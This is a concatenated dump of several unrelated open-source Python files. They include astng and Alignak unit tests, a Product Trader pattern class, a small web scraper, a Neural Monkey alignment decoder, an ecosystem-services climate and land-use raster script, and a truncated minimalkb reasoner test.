infered = list(get_name_node(astng, 'a').infer())
self.assertEqual(len(infered), 1)
self.assertIsInstance(infered[0], nodes.Const)
self.assertEqual(infered[0].value, 3)
def test_nonregr_func_arg(self):
code = '''
def foo(self, bar):
def baz():
pass
def qux():
return baz
spam = bar(None, qux)
print (spam)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(get_name_node(astng['foo'], 'spam').infer())
self.assertEqual(len(infered), 1)
self.assertIs(infered[0], YES)
def test_nonregr_func_global(self):
code = '''
active_application = None
def get_active_application():
global active_application
return active_application
class Application(object):
def __init__(self):
global active_application
active_application = self
class DataManager(object):
def __init__(self, app=None):
self.app = get_active_application()
def test(self):
p = self.app
print (p)
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(Instance(astng['DataManager']).igetattr('app'))
self.assertEqual(len(infered), 2, infered) # None / Instance(Application)
infered = list(get_name_node(astng['DataManager']['test'], 'p').infer())
self.assertEqual(len(infered), 2, infered)
for node in infered:
if isinstance(node, Instance) and node.name == 'Application':
break
else:
self.fail('expected to find an instance of Application in %s' % infered)
def test_list_inference(self):
"""#20464"""
code = '''
import optparse
A = []
B = []
def test():
xyz = [
"foobar=%s" % options.ca,
] + A + B
if options.bind is not None:
xyz.append("bind=%s" % options.bind)
return xyz
def main():
global options
parser = optparse.OptionParser()
(options, args) = parser.parse_args()
Z = test()
'''
astng = builder.string_build(code, __name__, __file__)
infered = list(astng['Z'].infer())
self.assertEqual(len(infered), 1, infered)
self.assertIsInstance(infered[0], Instance)
self.assertIsInstance(infered[0]._proxied, nodes.Class)
self.assertEqual(infered[0]._proxied.name, 'list')
def test__new__(self):
code = '''
class NewTest(object):
"doc"
def __new__(cls, arg):
self = object.__new__(cls)
self.arg = arg
return self
n = NewTest()
'''
astng = builder.string_build(code, __name__, __file__)
self.assertRaises(InferenceError, list, astng['NewTest'].igetattr('arg'))
n = astng['n'].infer().next()
infered = list(n.igetattr('arg'))
self.assertEqual(len(infered), 1, infered)
def test_two_parents_from_same_module(self):
code = '''
from data import nonregr
class Xxx(nonregr.Aaa, nonregr.Ccc):
"doc"
'''
astng = builder.string_build(code, __name__, __file__)
parents = list(astng['Xxx'].ancestors())
self.assertEqual(len(parents), 3, parents) # Aaa, Ccc, object
if __name__ == '__main__':
unittest_main()
| gpl-3.0 | 3,295,323,266,890,843,000 | 34.926638 | 147 | 0.594953 | false |
virtualnobi/MediaFiler | nobi/ProductTraderPattern.py | 1 | 2526 | """Product Trader Pattern
This class implements a simple version of the Product Trader Pattern:
A SimpleProductTrader manages a registry mapping specifications to classes.
Strings are used as Specification.
For each Product, a SimpleProductTrader is created.
Subclasses of Product register with this SimpleProductTrader.
To instantiate a (subclass of) Product, the appropriate class is retrieved
from the SimpleProductTrader using the Specification.
(c) by nobisoft 2015-
"""
# Imports
## Standard
from __future__ import absolute_import
import logging
## Contributed
## nobi
## Project
# Package Variables
Logger = logging.getLogger(__name__)
class SimpleProductTrader(object):
"""Implement a simple Product Trader, using strings to specify the class to instantiate.
"""
# Constants
# Class Methods
# Lifecycle
def __init__(self):
"""Create a SimpleProductTrader with empty registry.
"""
# inheritance
super(SimpleProductTrader, self).__init__()
# internal state
self.productRegistry = {} # mapping String to Class
#
return(None)
# Getters
def isKnown(self, specString):
"""Return True is specString is a known specification, i.e., getClassFor() would return a valid class.
String specString
Return Boolean
"""
return(specString in self.productRegistry)
def getClassFor(self, specString):
"""Return the class to which specString is mapped.
BaseException when specString was not registered.
Returns Class
"""
if (self.isKnown(specString)):
return(self.productRegistry[specString])
else:
raise(BaseException('Specification "%s" not found in registry of SimpleProductTrader' % specString))
def getClasses(self):
"""Return the set of classes registered.
"""
return(set(self.productRegistry.values()))
# Setters
def registerClassFor(self, clas, specString):
"""Inform the product trader that clas handles specString.
"""
if (specString in self.productRegistry):
# raise(BaseException('Specification "%s" already used in SimpleProductTrader' % specString))
Logger.warning('Overwriting specification "%s" in SimpleProductTrader' % specString)
self.productRegistry[specString] = clas
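# ----------------------------------------------------------------------------
# Illustrative usage (added example, not part of the original module).
# A minimal sketch of the register/lookup flow described in the module
# docstring; the Product/Image classes below are hypothetical names invented
# only for this demonstration.
if __name__ == "__main__":
    class Product(object):
        pass
    class Image(Product):
        pass
    trader = SimpleProductTrader()
    trader.registerClassFor(Image, "image")
    assert trader.isKnown("image")
    # Retrieve the class via its specification and instantiate it.
    product = trader.getClassFor("image")()
    print("Created instance of %s" % product.__class__.__name__)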
| gpl-3.0 | -2,615,523,185,855,493,600 | 26.382022 | 112 | 0.644101 | false |
Alignak-monitoring/alignak | tests/test_satellite_link.py | 1 | 3229 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2015-2018: Alignak team, see AUTHORS.txt file for contributors
#
# This file is part of Alignak.
#
# Alignak is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Alignak is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Alignak. If not, see <http://www.gnu.org/licenses/>.
from .alignak_test import AlignakTest
from alignak.objects.arbiterlink import ArbiterLink
from alignak.objects.schedulerlink import SchedulerLink
from alignak.objects.brokerlink import BrokerLink
from alignak.objects.reactionnerlink import ReactionnerLink
from alignak.objects.receiverlink import ReceiverLink
from alignak.objects.pollerlink import PollerLink
class template_DaemonLink_get_name():
    def get_link(self):
        cls = self.daemon_link
        return cls({})

    def test_get_name(self):
        link = self.get_link()
        print(("Link: %s / %s" % (type(link), link)))
        link.fill_default()
        print(("Name: %s / %s / %s" % (link.type, link.name, link.get_name())))
        print(("Config: %s" % (link.give_satellite_cfg())))
        print(("Config: %s" % (link.have_conf)))
        assert False == link.have_conf
        try:
            self.assertEqual("Unnamed {0}".format(self.daemon_link.my_type), link.get_name())
        except AttributeError:
            self.assertTrue(False, "get_name should not raise AttributeError")


class Test_ArbiterLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link arbiter"""
    def setUp(self):
        super(Test_ArbiterLink_get_name, self).setUp()
    daemon_link = ArbiterLink


class Test_SchedulerLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link scheduler"""
    def setUp(self):
        super(Test_SchedulerLink_get_name, self).setUp()
    daemon_link = SchedulerLink


class Test_BrokerLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link broker"""
    def setUp(self):
        super(Test_BrokerLink_get_name, self).setUp()
    daemon_link = BrokerLink


class Test_ReactionnerLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link reactionner"""
    def setUp(self):
        super(Test_ReactionnerLink_get_name, self).setUp()
    daemon_link = ReactionnerLink


class Test_ReceiverLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link receiver"""
    def setUp(self):
        super(Test_ReceiverLink_get_name, self).setUp()
    daemon_link = ReceiverLink


class Test_PollerLink_get_name(template_DaemonLink_get_name, AlignakTest):
    """Test satellite link poller"""
    def setUp(self):
        super(Test_PollerLink_get_name, self).setUp()
    daemon_link = PollerLink
| agpl-3.0 | -3,222,885,129,645,364,700 | 32.989474 | 93 | 0.703314 | false |
vietdh85/vh-utility | script/rcb/graspgold.py | 1 | 1037 | import sys
import os.path
from pyquery import PyQuery as pq
import time
import common
def getValues(item):
    url = item[3]
    print("getValues(): ", url)
    format = "%b %d %Y %H:%M:%S"
    d = pq(url=url)
    list = d(".list td")
    index = 0
    while index < len(list):
        try:
            obj = {}
            obj['date'] = common.removeNumberString(list[index].text_content())
            obj['time'] = common.dateStringToTimestamp(obj['date'], format=format)
            obj['time'] = common.formatTimestamp(obj['time'])
            obj['user'] = list[index + 1].text_content()
            obj['deposit'] = list[index + 2].text_content().split("/")[0].replace("$", "")
            obj['site_id'] = item[0]
            obj['monitor'] = item[2]
            print("{0} - {1} - {2} - {3} - {4} - {5}".format(obj['site_id'], obj['monitor'], obj['date'], obj['time'], obj['user'], obj['deposit']))
            if common.insertUserRcb(obj) == -1:
                return
        except Exception:
            pass
        index += 5

def run(item):
    print "\n========== RUN graspgold.run() ============"
    # try :
    getValues(item)
    # except Exception:
    # pass
| gpl-3.0 | 1,925,032,494,287,725,800 | 22.568182 | 139 | 0.580521 | false |
juliakreutzer/bandit-neuralmonkey | neuralmonkey/decoders/word_alignment_decoder.py | 1 | 3918 | from typing import cast
import numpy as np
import tensorflow as tf
from neuralmonkey.dataset import Dataset
from neuralmonkey.encoders.recurrent import RecurrentEncoder
from neuralmonkey.decoders.decoder import Decoder
from neuralmonkey.logging import warn
from neuralmonkey.model.model_part import ModelPart, FeedDict, InitializerSpecs
from neuralmonkey.model.sequence import Sequence
from neuralmonkey.decorators import tensor
class WordAlignmentDecoder(ModelPart):
"""A decoder that computes soft alignment from an attentive encoder.
Loss is computed as cross-entropy against a reference alignment.
"""
def __init__(self,
encoder: RecurrentEncoder,
decoder: Decoder,
data_id: str,
name: str,
initializers: InitializerSpecs = None) -> None:
ModelPart.__init__(self, name, None, None, initializers)
self.encoder = encoder
self.decoder = decoder
self.data_id = data_id
if not isinstance(self.encoder.input_sequence, Sequence):
raise TypeError("Expected Sequence type in encoder.input_sequence")
self.enc_input = cast(Sequence, self.encoder.input_sequence)
# TODO this is here to call the lazy properties which create
# the list of attention distribbutions
# pylint: disable=pointless-statement
self.decoder.runtime_logits
self.decoder.train_logits
# pylint: enable=pointless-statement
_, self.train_loss = self._make_decoder(runtime_mode=False)
self.decoded, self.runtime_loss = self._make_decoder(runtime_mode=True)
tf.summary.scalar("alignment_train_xent", self.train_loss,
collections=["summary_train"])
@tensor
def ref_alignment(self) -> tf.Tensor:
# TODO dynamic shape?
return tf.placeholder(
dtype=tf.float32,
shape=[None, self.decoder.max_output_len,
self.enc_input.max_length],
name="ref_alignment")
@tensor
def alignment_target(self) -> tf.Tensor:
# shape will be [max_output_len, batch_size, max_input_len]
return tf.transpose(self.ref_alignment, perm=[1, 0, 2])
def _make_decoder(self, runtime_mode=False):
attn_obj = self.decoder.get_attention_object(self.encoder,
not runtime_mode)
if runtime_mode:
alignment_logits = tf.stack(
attn_obj.histories["{}_run".format(
self.decoder.name)],
name="alignment_logits")
# make batch_size the first dimension
alignment = tf.transpose(tf.nn.softmax(alignment_logits),
perm=[1, 0, 2])
loss = tf.constant(0)
else:
alignment_logits = tf.stack(
attn_obj.histories["{}_train".format(
self.decoder.name)],
name="alignment_logits")
alignment = None
xent = tf.nn.softmax_cross_entropy_with_logits(
labels=self.alignment_target, logits=alignment_logits)
loss = tf.reduce_sum(xent * self.decoder.train_padding)
return alignment, loss
@property
def cost(self) -> tf.Tensor:
return self.train_loss
def feed_dict(self, dataset: Dataset, train: bool = False) -> FeedDict:
fd = {}
alignment = dataset.maybe_get_series(self.data_id)
if alignment is None:
if train:
warn("Training alignment not present!")
alignment = np.zeros((len(dataset),
self.decoder.max_output_len,
self.enc_input.max_length),
np.float32)
fd[self.ref_alignment] = alignment
return fd
| bsd-3-clause | 5,833,592,751,520,678,000 | 34.944954 | 79 | 0.593415 | false |
JamesSample/ecosystem_services_impacts | Code/01_es_lu_cc.py | 1 | 21539 | #------------------------------------------------------------------------------
# Name: 01_es_lu_cc.py
# Purpose: Processing for the CREW project on ES, LUC and CC.
#
# Author: James Sample
#
# Created: 14/01/2015
# Copyright: (c) James Sample and JHI, 2015
# License: https://github.com/JamesSample/ecosystem_services_impacts/blob/master/LICENSE
#------------------------------------------------------------------------------
""" Processes the Future Flows (FF) climate data and estimate climate and land
use change effects on Ecosystem Services (ES). Reads workshop outputs and
performs the following steps:
1. For each ES, reads monthly rainfall and ET grids for the months
specified for both baseline and future periods. For the seasons of
interest, calculates the % change in rainfall and ET between
baseline and future.
2. Combines rainfall and runoff percentage changes into a qualitative
grid of change in runoff.
3. Estimates impacts grids for each ES for CC only, LUC only and CC &
LUC combined.
Inputs grids are supplied in HDF5 file format.
"""
import pandas as pd, h5py, numpy as np, matplotlib, matplotlib.pyplot as plt
import os, sys
from mpl_toolkits.axes_grid1 import ImageGrid
from osgeo import gdal, gdalconst, osr
def read_array_from_h5(h5, variable, model, year, month):
""" Read an array from a specified location in an H5 file.
Args:
h5: The open HDF5 file object
variable: The variable of interest ('rainfall' or 'pet')
model: The code for the climate model of interest (string)
year: Year (integer)
month: Month (integer)
Returns:
array
"""
dset_path = r'/ff_data/%s/%s/%s_%s' % (model, variable, variable, year)
data = h5.get(dset_path)[:,:,month-1].astype(float)
# Set NoData to NaN
data[data==-99] = np.nan
# Convert units
data = data/100
return data
def avg_rain_et(h5, st_yr, end_yr, months):
""" Calculate average rainfall and ET grids for the specified years and
months.
Args:
h5: The open HDF5 file object
st_yr: Start year for period of interest (integer)
end_yr: End year for period of interest (integer)
months: List of months of interest (integers)
Returns:
Tuple of arrays (average rainfall, average PET)
"""
# Empty arrays to store rainfall and ET totals
rn_tot = np.zeros((715, 485))
et_tot = np.zeros((715, 485))
# Total number of years to average over
years = end_yr + 1 - st_yr
# Loop over rainfall and ET
for year in range(st_yr, end_yr+1):
for month in months:
# Read rainfall and ET grids
rn = read_array_from_h5(h5, 'rainfall', model, year, month)
et = read_array_from_h5(h5, 'pet', model, year, month)
# Add to totals
rn_tot += rn
et_tot += et
# Average
rn_av = rn_tot/years
et_av = et_tot/years
return (rn_av, et_av)
def plot_avg_grids(base_rn_av, base_et_av, fut_rn_av, fut_et_av):
""" Plot the average rainfall and ET grids. Used for testing.
Args:
base_rn_av: Average rainfall grid for baseline period.
base_et_av: Average PET grid for baseline period.
fut_rn_av: Average rainfall grid for future period.
fut_et_av: Average PET grid for future period.
Returns:
None. Displays maps of each grid using same colour scale.
"""
# Get min and max values from grids
rnmin = min(np.nanmin(base_rn_av), np.nanmin(fut_rn_av))
rnmax = max(np.nanmax(base_rn_av), np.nanmax(fut_rn_av))
etmin = min(np.nanmin(base_et_av), np.nanmin(fut_et_av))
etmax = max(np.nanmax(base_et_av), np.nanmax(fut_et_av))
# Plot
fig = plt.figure()
grid = ImageGrid(fig, 111,
nrows_ncols = (1, 4),
axes_pad=0.5,
cbar_mode='each')
im0 = grid[0].imshow(base_rn_av, vmin=rnmin, vmax=rnmax,
interpolation='nearest')
grid.cbar_axes[0].colorbar(im0)
im1 = grid[1].imshow(fut_rn_av, vmin=rnmin, vmax=rnmax,
interpolation='nearest')
grid.cbar_axes[1].colorbar(im1)
im2 = grid[2].imshow(base_et_av, vmin=etmin, vmax=etmax,
interpolation='nearest')
grid.cbar_axes[2].colorbar(im2)
im3 = grid[3].imshow(fut_et_av, vmin=etmin, vmax=etmax,
interpolation='nearest')
grid.cbar_axes[3].colorbar(im3)
plt.show()
def plot_reclassified_grid(array, out_path, sup_title='Main title',
title='Sub-title'):
""" Plot and save the reclassified grid.
Args:
array: Grid of integers in range -2 to +2
out_path: Output file path (PNG or PDF)
sup_title: Main title for plot (string)
title: Sub-title for plot (string)
Returns:
None. Saves a plot to the specified path.
"""
# Make a color map of fixed colors
cmap = matplotlib.colors.ListedColormap(['Red', 'Orange', 'LimeGreen',
'DeepSkyBlue', 'Blue'])
bounds=[-2.5, -1.5, -0.5, 0.5, 1.5, 2.5]
norm = matplotlib.colors.BoundaryNorm(bounds, cmap.N)
# Create axes for plot (A4 size)
fig, axes = plt.subplots(nrows=1, ncols=1, figsize=(8.3,11.7))
# Plot the array, using the colours specified
img = axes.imshow(array, interpolation='nearest', origin='upper',
cmap=cmap, norm=norm)
# Add labels to plot
plt.title(title)
plt.suptitle(sup_title, fontsize=16, y=0.95)
plt.ylabel('Northing')
plt.xlabel('Easting')
plt.grid(True)
# Reformat the axis labels (mainly change the Y values into northings)
axes.set_yticks([35, 135, 235, 335, 435, 535, 635, 735])
axes.set_yticklabels([1200, 1100, 1000, 900, 800, 700, 600, 500])
axes.set_xticks([100, 200, 300, 400])
# Add axes for the color bar
cax = fig.add_axes([0.2, 0.785, 0.02, 0.10])
# Add the colour bar and set labels
cbar = fig.colorbar(img, cax=cax, cmap=cmap, norm=norm, boundaries=bounds,
ticks=[-2.2,-1.2,-0.2,0.8,1.8])
cbar.set_ticklabels(['Large decrease',
'Small decrease',
'Neutral',
'Small increase',
'Large increase'], update_ticks=True)
# Make the cbar ticks invisible
ticks = cbar.ax.get_yticklines()
for tick in ticks:
plt.setp(tick, alpha=0)
cbar_labels = plt.getp(cbar.ax.axes, 'yticklabels')
plt.setp(cbar_labels, fontsize=10)
# Save fig
plt.savefig(out_path, dpi=300)
## plt.show()
plt.clf()
plt.close()
def reclass_rn_et_grid(array):
""" Take an array of percentage changes and reclassify it according to:
% change | Class
x<=-15 | -2
-15<x<=-5 | -1
-5<x<=5 | 0
5<x<=15 | +1
15<x | +2
Args:
array: Array of percentage changes to be reclassified.
Returns:
Reclassified array
"""
# Create copy of array for reclass values
rc = array.copy()
rc[array<=-15] = -2
rc[(-15<array) & (array<=-5)] = -1
rc[(-5<array) & (array<=5)] = 0
rc[(5<array) & (array<=15)] = 1
rc[15<array] = 2
return rc
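# --- Worked example (added for illustration; not called anywhere below) ---
# Exercises each band of the percentage-change reclassification documented in
# the docstring above, on a tiny hand-made array. The numbers are invented
# purely to hit every class boundary.
def _demo_reclass_rn_et_grid():
    demo = np.array([[-20.0, -10.0, 0.0],
                     [10.0, 20.0, np.nan]])
    rc = reclass_rn_et_grid(demo)
    # Expected classes: -2, -1, 0 on the first row; +1, +2, NaN on the second
    assert np.array_equal(rc[0], np.array([-2.0, -1.0, 0.0]))
    assert np.array_equal(rc[1, :2], np.array([1.0, 2.0]))
    assert np.isnan(rc[1, 2])
    return rc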
def reclass_ro(matrix_path, rn, et):
""" Generate reclassification matrix for runoff based on reclassified
change grids for rainfall and PET and the runoff reclassification
matrix from the workshop.
Args:
matrix_path: Path to CSV file representing runoff matrix.
rn: Reclassified rainfall grid from reclass_rn_et_grid
et: Reclassified PET grid from reclass_rn_et_grid
Returns:
Array (grid of integers representing change in runoff)
"""
# Read matrix
df = pd.read_csv(matrix_path, index_col=0)
# Grid of NaNs with correct shape
ro = rn.copy()*np.nan
# Loop over indices
for x, y in np.ndindex(ro.shape):
# Get values for change in rainfall and ET
et_ch = et[x, y]
rn_ch = rn[x, y]
# If both are not nan, reclassify
if (np.isfinite(et_ch) and np.isfinite(rn_ch)):
rc_val = df.ix[int(et_ch), str(int(rn_ch))]
ro[x, y] = rc_val
return ro
def reclass_es_ro(es_idx, ro):
""" Reclassify the runoff grid to estimate effects of runoff change on each
ES.
Args:
es_idx: The ID of the ES of interest in data frame ro_df
ro: The runoff change grid from reclass_ro
Returns:
Array (grid of integers representing change in ES)
"""
# Make a copy of the ro grid to update
es = ro.copy()
# Reclassify
for chng in [-2, -1, 0, 1, 2]:
es[ro==chng] = ro_df.ix[es_idx, 'RO_%d' % chng]
return es
def read_ascii(ascii_path,
xmin=0,
xmax=485000,
ymin=520000,
ymax=1235000,
exptd_rows=715,
exptd_cols=485,
exptd_px_wd=1000,
exptd_px_ht=-1000,
exptd_ndv=-9999):
""" Read an ASCII grid file, clip it to the specified bounding box and
return a numpy array.
Args:
ascii_path: Path to the ASCII grid file to read.
xmin: Minimum Easting in OSGB1936 metres.
xmax: Maximum Easting in OSGB1936 metres.
ymin: Minimum Northing in OSGB1936 metres.
ymax: Maximum Northing in OSGB1936 metres.
exptd_rows: No. of rows expected in file.
exptd_cols: No. of columns expected in file.
exptd_px_wd: Cell width.
exptd_px_ht: Cell height.
exptd_ndv: No data value.
Returns:
Array (floats).
"""
# Register drivers
gdal.AllRegister()
# Process the file with GDAL
ds = gdal.Open(ascii_path, gdalconst.GA_ReadOnly)
if ds is None:
print 'Could not open ' + ascii_path
sys.exit(1)
# In order to select the first cell correctly, choose a point just within
# the top left corner of the specified bounding box.
x = xmin + 10
y = ymax - 10
# Dataset properties
geotransform = ds.GetGeoTransform()
originX = geotransform[0]
originY = geotransform[3]
pixelWidth = geotransform[1]
pixelHeight = geotransform[5]
# Calculate number of rows and cols to return
rows = abs(int((ymax-ymin)/pixelHeight))
cols = int((xmax-xmin)/pixelWidth)
# Select starting pixel
xOffset = int((x - originX) / pixelWidth)
yOffset = int((y - originY) / pixelHeight)
band = ds.GetRasterBand(1)
no_data_val = band.GetNoDataValue()
# Simple checking
assert rows == exptd_rows
assert cols == exptd_cols
assert pixelWidth == exptd_px_wd
assert pixelHeight == exptd_px_ht
assert no_data_val == exptd_ndv
# Read the data to an array
data = band.ReadAsArray(xOffset, yOffset, cols, rows)
# Close the dataset
ds = None
return data.astype(float)
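# --- Example call (added for illustration) ---
# A sketch of how read_ascii might be used; the path below is a placeholder,
# not a file shipped with this project. The default keyword arguments clip to
# the 485 km x 715 km OSGB1936 window used throughout this script.
#
# grid = read_ascii(r'D:\path\to\some_grid.txt')
# grid[grid==-9999] = np.nan # mask NoData, as done for the land use grids below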
def process_land_use_change(lu_mat_path, base, fut, esid, codes_df):
""" Estimate land use change (LUC) only effects for the specified ES.
Args:
lu_mat_path: Excel file containing land use matrices from the workshop.
base: Baseline land luse grid.
fut: Future land luse grid.
esid: ES ID from land use matrices Excel file
codes_df: Land use code look-up table (as data frame)
Returns:
Array (grid of integers representing change in ES)
"""
# Read matrix for this ES
lu_mat = pd.read_excel(lu_mat_path, sheetname='Land Use')
# Get row for start of matrix
st_row = (lu_mat['ES_ID']==esid).nonzero()[0][0] + 2
# Read matrix of interest
lu_mat = pd.read_excel(lu_mat_path, sheetname='Land Use', skiprows=st_row,
skip_footer=(120-6-st_row), parse_cols='C:I',
index_col=0)
# Perform reclassification
# Grid of NaNs with correct shape
rc = base.copy()*np.nan
# Loop over indices
for x, y in np.ndindex(base.shape):
# Get values for baseline and future LU
base_lu = base[x, y]
fut_lu = fut[x, y]
# If both are not nan, reclassify
if (np.isfinite(base_lu) and np.isfinite(fut_lu)):
# Get the base and fut LU as a string
base_str = codes_df.ix[int(base_lu)]['LU_Class']
fut_str = codes_df.ix[int(fut_lu)]['LU_Class']
rc_val = lu_mat.ix[base_str, fut_str]
rc[x, y] = rc_val
return rc
def process_land_use_and_climate_change(lucc_mat_path, lugrid, ccgrid, esid):
""" Estimate combined land use and climate change effects for the specified
ES.
Args:
lucc_mat_path: Excel file containing matrices from the workshop.
lugrid: The grid of land use change effects.
ccgrid: The grid of climate change effects.
esid: ES ID from workshop matrices Excel file.
Returns:
Array (grid of integers representing change in ES)
"""
# Read matrix for this ES
lucc_mat = pd.read_excel(lucc_mat_path, sheetname='CC_LU')
# Get row for start of matrix
st_row = (lucc_mat['ES_ID']==esid).nonzero()[0][0] + 2
# Read matrix of interest
lucc_mat = pd.read_excel(lucc_mat_path, sheetname='CC_LU', skiprows=st_row,
skip_footer=(108-5-st_row), parse_cols='C:I',
index_col=0)
# Perform reclassification
# Grid of NaNs with correct shape
rc = lugrid.copy()*np.nan
# Loop over indices
for x, y in np.ndindex(lugrid.shape):
# Get values for baseline and future LU
lu = lugrid[x, y]
cc = ccgrid[x, y]
# If both are not nan, reclassify
if (np.isfinite(lu) and np.isfinite(cc)):
# Get the base and fut LU as a string
rc_val = lucc_mat.ix[int(lu), int(cc)]
rc[x, y] = rc_val
return rc
def array_to_gtiff(out_path, data_array, ndv=-9999, xmin=0, ymax=1235000,
cell_size=1000):
""" Convert numpy array to 16-bit integer GeoTiff.
Args:
out_path: The .tif file to be created.
data_array: The (integer) data array to save.
ndv: No data value.
xmin: Minimum x (Easting) co-ordinate, in OSGB1936 metres
ymax: Maximim y (Northing) co-ordinate, in OSGB1936 metres
cell_size: Cell size (metres)
Returns:
None. Array is saved to specified path.
"""
# Copy data_array so that it is not modified
data = data_array.copy()
# Convert NaNs to NDV
data[np.isnan(data)] = ndv
# Get array shape
cols = data.shape[1]
rows = data.shape[0]
# Get driver
driver = gdal.GetDriverByName('GTiff') # NB can't directly create ArcInfo ASCII grids in this way
# Create a new raster data source
out_ds = driver.Create(out_path, cols, rows, 1, gdal.GDT_Int16)
# Get spatial ref details
srs = osr.SpatialReference()
srs.ImportFromEPSG(27700) # From EPSG for OSGB36 grid
# Write metadata
out_ds.SetGeoTransform((xmin, cell_size, 0.0, ymax, 0.0, -1*cell_size)) #(xmin, cellsize, 0, ymax, 0, -cellsize)
out_ds.SetProjection(srs.ExportToWkt())
out_band = out_ds.GetRasterBand(1)
out_band.SetNoDataValue(ndv)
out_band.WriteArray(data)
# Tidy up
del out_ds, out_band
# #############################################################################
# User input
# Climate data
ff_h5_path = r'D:\WBM_Development_2014\WBM_2014_Monthly_Input_File.h5'
# Runoff matrices
ro_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Runoff_Impacts_Grp1.csv'
ro_matrix_15 = r'D:\Eco_Services_Impacts\Matrices_Development\02_Common_Matrices\Runoff_Matrix_15pct.csv'
# Land use data
base_path = r'D:\Eco_Services_Impacts\Land_Use\baseline_lu_lcm07.txt'
fut_path = r'D:\Eco_Services_Impacts\Land_Use\future_lu_2050.txt'
# Land use matrices
lu_classes_path = r'D:\Eco_Services_Impacts\Land_Use\Land_Use_Classes.csv'
lu_matrices_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Land_Use_Matrices_Grp1.xlsx'
# Land use and climate combined matrices
lucc_matrices_path = r'D:\Eco_Services_Impacts\Matrices_Development\03_Group_1_Matrices\Climate_And_Land_Use_Matrices_Grp1.xlsx'
# Output folders
out_pdf_fold = r'D:\Eco_Services_Impacts\Model_Output\02_Group_1_Output\PDF'
out_array_fold = r'D:\Eco_Services_Impacts\Model_Output\02_Group_1_Output\GeoTiffs'
# Time periods to compare
base_st_yr, base_end_yr = 1961, 1990
fut_st_yr, fut_end_yr = 2041, 2070
# Future Flows models of interest
models = ['afixa', 'afixc', 'afixl', 'afixm', 'afixo', 'afixh',
'afixi', 'afixj', 'afixk', 'afgcx', 'afixq']
# #############################################################################
# Read LU grids
base = read_ascii(base_path)
base[base==-9999] = np.nan
fut = read_ascii(fut_path)
fut[fut==-9999] = np.nan
# Read LU class codes
codes_df = pd.read_csv(lu_classes_path, index_col=0)
# Read the runoff matrices
ro_df = pd.read_csv(ro_path, index_col=0)
# Open H5 file
h5 = h5py.File(ff_h5_path, 'r')
# Iterate over each ES
for idx in ro_df.index:
print '\nProcessing land use change impacts for %s.' % ro_df.ix[idx, 'ES']
# 1. Process land use change only
luc = process_land_use_change(lu_matrices_path, base, fut, idx, codes_df)
# Prepare to save
out_name = 'ES%02d_LUC' % idx
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, luc)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(luc, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(land use change only)' )
# 2. Process climate change only
# Get the relevant months for this ES
months = [int(i) for i in ro_df.ix[idx, 'Key_Months'].split(',')]
# Loop over climate models of interest
for model in models:
print ('Processing climate change impacts for '
'%s (model %s).' % (ro_df.ix[idx, 'ES'], model))
# 2.1. Baseline
base_rn_av, base_et_av = avg_rain_et(h5, base_st_yr, base_end_yr,
months)
# 2.2. Future
fut_rn_av, fut_et_av = avg_rain_et(h5, fut_st_yr, fut_end_yr,
months)
# Plot
# plot_avg_grids(base_rn_av, base_et_av, fut_rn_av, fut_et_av)
# Calculate % change
rn_pct = 100*(fut_rn_av - base_rn_av)/base_rn_av
et_pct = 100*(fut_et_av - base_et_av)/base_et_av
# Reclassify
rn_rc = reclass_rn_et_grid(rn_pct)
et_rc = reclass_rn_et_grid(et_pct)
# plot_reclassified_grid(rn_rc)
# plot_reclassified_grid(et_rc)
# Generate runoff grid
ro = reclass_ro(ro_matrix_15, rn_rc, et_rc)
# # Plot runoff grid
# plot_reclassified_grid(ro,
# sup_title='Change in runoff',
# title='(Model %s; %s)' % (model, months))
# Reclass ro grid to estimate ES impact
es = reclass_es_ro(idx, ro)
# Prepare to save
out_name = 'ES%02d_%s' % (idx, model)
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, es)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(es, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(climate model %s only)' % model)
# 3. Process combined land use and climate effects
print ('Processing climate and land use change impacts for '
'%s (model %s).' % (ro_df.ix[idx, 'ES'], model))
# Reclassify to get CC and LUC effects
cc_lu = process_land_use_and_climate_change(lucc_matrices_path, luc,
es, idx)
# Prepare to save
out_name = 'ES%02d_LUC_%s' % (idx, model)
# Save array
out_array = os.path.join(out_array_fold, '%s.tif' % out_name)
array_to_gtiff(out_array, cc_lu)
# Save PDF
out_pdf = os.path.join(out_pdf_fold, '%s.pdf' % out_name)
plot_reclassified_grid(cc_lu, out_pdf,
sup_title='Change in %s' % ro_df.ix[idx, 'ES'],
title='(climate and land use change together)')
# Close H5 file
h5.close()
print '\nFinished.' | mit | 7,467,887,343,285,515,000 | 32.92126 | 128 | 0.566229 | false |
severin-lemaignan/minimalkb | testing/test_reasoner.py | 1 | 3841 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
import logging
import unittest
import time
try:
import kb
except ImportError:
import sys
print("You must first install pykb")
sys.exit(1)
from minimalkb import __version__
from queue import Empty
REASONING_DELAY = 0.2
class TestRDFSReasoner(unittest.TestCase):
    def setUp(self):
        self.kb = kb.KB()
        self.kb.clear()

    def tearDown(self):
        self.kb.close()

    def test_complex_events_rdfs(self):
        evtid = self.kb.subscribe(["?a desires ?act", "?act rdf:type Action"], var = "a")
